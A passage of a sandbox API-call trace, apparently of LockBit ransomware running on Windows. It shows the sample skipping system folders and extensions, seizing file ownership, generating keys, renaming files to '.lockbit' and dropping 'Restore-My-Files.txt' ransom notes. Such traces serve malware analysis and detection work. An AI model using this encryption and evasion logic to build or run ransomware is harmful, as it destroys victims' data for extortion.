(FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.745] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.745] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3081) returned 1 [0081.745] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.746] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.746] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.747] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.757] malloc (_Size=0xe4) returned 0x77d800 [0081.757] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe4, FileInformationClass=0xa) returned 0xc0000008 [0081.757] free (_Block=0x77d800) [0081.757] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.757] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.757] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.757] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70b5623e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70b5623e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 0 [0081.757] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0081.757] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Memories", cAlternateFileName="")) returned 1 [0081.759] lstrcmpiW (lpString1=".", lpString2="Memories") returned -1 [0081.759] lstrcmpiW (lpString1="..", lpString2="Memories") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="$windows.~bt") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="intel") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="msocache") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="$recycle.bin") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="$windows.~ws") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="tor browser") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="boot") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="system volume information") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="perflogs") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="google") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="application data") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="windows") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="windows.old") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="appdata") returned 1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="Windows nt") returned -1 [0081.759] lstrcmpiW (lpString1="Memories", lpString2="Msbuild") returned -1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="Microsoft") returned -1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="All users") returned 1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="mozilla") returned -1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="Microsoft.NET") returned -1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="microsoft shared") returned -1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="Internet Explorer") returned 1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="common files") returned 1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="opera") returned -1 [0081.760] lstrcmpiW (lpString1="Memories", lpString2="Windows Journal") returned -1 [0081.760] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 53 [0081.760] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*") returned 55 [0081.760] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0081.762] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0081.762] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.762] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0081.762] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0081.762] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d74af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710d74af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb08f, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 [0081.762] lstrcmpiW (lpString1=".", lpString2="16_9-frame-background.png") returned -1 [0081.762] lstrcmpiW (lpString1="..", lpString2="16_9-frame-background.png") returned -1 [0081.762] PathFindExtensionW (pszPath="16_9-frame-background.png") returned=".png" [0081.762] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.762] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.762] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.762] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.762] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.763] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.763] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.763] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.763] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.763] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.763] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.763] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.764] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.764] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.764] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.764] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.764] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.764] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-background.png") returned 1 [0081.764] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-background.png") returned 1 [0081.764] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-background.png") returned 1 [0081.764] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-background.png") returned 1 [0081.764] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-background.png") returned 1 [0081.764] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-background.png") returned 1 [0081.764] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-background.png") returned 1 [0081.764] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.764] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png") returned=".png" [0081.764] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.764] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.765] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.765] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.766] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png.lockbit") returned 87 [0081.766] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.770] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.771] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.771] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.771] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.771] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.771] RtlFreeAnsiString (AnsiString="\\") [0081.771] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.771] malloc (_Size=0x200) returned 0x77d800 [0081.771] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.771] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.771] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.771] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.772] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.772] CloseHandle (hObject=0x3b4) returned 1 [0081.772] free (_Block=0x77d800) [0081.772] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.773] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.773] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.773] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=45199) returned 1 [0081.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.773] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.773] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.774] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.774] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.776] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.776] malloc (_Size=0xc4) returned 0x77d800 [0081.776] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0081.777] free (_Block=0x77d800) [0081.777] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.777] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.777] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.778] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.778] malloc (_Size=0x40068) returned 0x1ff1e60 [0081.778] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0081.780] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710fd60c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710fd60c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc32, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0081.780] lstrcmpiW (lpString1=".", lpString2="16_9-frame-highlight.png") returned -1 [0081.780] lstrcmpiW (lpString1="..", lpString2="16_9-frame-highlight.png") returned -1 [0081.780] PathFindExtensionW (pszPath="16_9-frame-highlight.png") returned=".png" [0081.780] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.780] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.780] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.781] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.781] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.781] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.781] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.781] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.782] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.782] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.782] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.782] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.782] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.782] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.782] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-highlight.png") returned 1 [0081.782] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-highlight.png") returned 1 [0081.782] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-highlight.png") returned 1 [0081.782] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-highlight.png") returned 1 [0081.782] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-highlight.png") returned 1 [0081.782] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-highlight.png") returned 1 [0081.783] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-highlight.png") returned 1 [0081.783] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.783] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png") returned=".png" [0081.783] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.783] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.783] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.783] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.784] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.784] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.784] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.784] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.784] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.784] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.784] lstrcmpiW (lpString1=".sqlite3", 